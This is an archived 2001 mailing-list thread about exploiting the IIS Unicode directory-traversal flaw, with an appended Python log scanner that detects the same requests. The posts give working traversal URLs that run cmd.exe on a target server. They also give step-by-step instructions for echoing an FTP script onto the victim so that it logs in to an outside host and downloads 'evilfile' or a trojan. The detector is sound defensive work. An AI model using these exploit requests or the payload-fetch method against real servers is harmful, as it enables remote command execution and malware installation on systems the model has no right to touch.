Vulnerability Development mailing list archives

Re: [unicode / iis4]


From: white hat eagle <whitehateagle () USA NET>
Date: Sat, 6 Jan 2001 15:31:31 MST

Hi folks,
In order to download a file by using mdac.pl or mdac2.pl or the iis/unicode
exploit, you should create a file, say, ftptmp.txt, and you should issue
the following command:
 ftp -n -s:ftptmp.txt
where the -n switch will suppress the interactive logon mode and the -s switch
will contain the commands and user credentials.
The contents of ftptmp.txt should be:
 open x.x.x.x [or the name of the ftp server]
 user
 anonymous
 me () hacker com
 bin
 get evilfile
 bye
To create this file you should use the "echo" command and redirect the
content to the file ftptmp.txt as follows:
 echo open x.x.x.x >ftptmp.txt && echo user >>ftptmp.txt.......
and so on.
Good luck,
whe-

Mad Zigy <zigy () GLOBAL CO ZA> wrote:
Well, I have been able to use msadc2.pl, yet the commands I give do not
work. So I tried the other way by doing
http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test.txt
and all it did was say: The parameter is incorrect.
So then I thought maybe we can't have a > in the string, so I found the
hex of it and tried
http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+test+%3e+c:\test.txt
yet it still gave me the same: The parameter is incorrect.
I have been able to make it ftp into my PC by
http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ftp+hostname
but I can't make it log in, as I need to echo a script which I can run
http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ftp+-s:c:\ftp.txt+hostname
so that it will log in and download the exe / trojan.
Thankz zigy!
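
For defenders reviewing web server logs for the request pattern quoted in this thread, here is an added example (not part of the original posts) that flags overlong UTF-8 in the URI stem, ".." segments that appear only after lenient decoding, and cmd.exe as the requested file. The log line layout ("client method raw-uri status") and the sample lines are constructed, and it assumes the log records the raw percent-encoded request URI.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample log lines ("client method raw-uri status"); not real traffic.
SAMPLE_LOG = [
    "10.0.0.5 GET /default.asp?id=1 200",
    "10.0.0.5 GET /images/caf%c3%a9.gif 200",
    "10.0.0.5 GET /docs/a..b/readme.txt 200",
    "10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+ftp+hostname 502",
]

def lenient_decode(raw: bytes):
    """Decode like a non-strict UTF-8 decoder; return (text, overlong_count)."""
    out, overlong, i = bytearray(), 0, 0
    while i < len(raw):
        b = raw[i]
        # 0xC0/0xC1 lead bytes can only encode code points below 0x80, which
        # UTF-8 requires to be one byte: always an overlong (invalid) form.
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            overlong += 1
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1"), overlong

def classify(uri: str):
    """Return the list of findings for one raw request URI."""
    stem = uri.partition("?")[0]
    text, overlong = lenient_decode(unquote_to_bytes(stem))
    segments = text.replace("\\", "/").split("/")
    findings = []
    if overlong:
        findings.append("overlong-utf8")
    if ".." in segments:
        findings.append("traversal-after-decode")
    if segments[-1].lower() == "cmd.exe":
        findings.append("shell-in-stem")
    return findings

def scan(lines):
    """Return (uri, findings) for every log line with at least one finding."""
    hits = [(line.split()[2], classify(line.split()[2])) for line in lines]
    return [(uri, findings) for uri, findings in hits if findings]

if __name__ == "__main__":
    for uri, findings in scan(SAMPLE_LOG):
        print(uri, findings)
```

The valid two-byte sequence %c3%a9 and the file name a..b are deliberately left unflagged, since only 0xC0/0xC1 lead bytes and whole ".." path segments are treated as suspicious.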



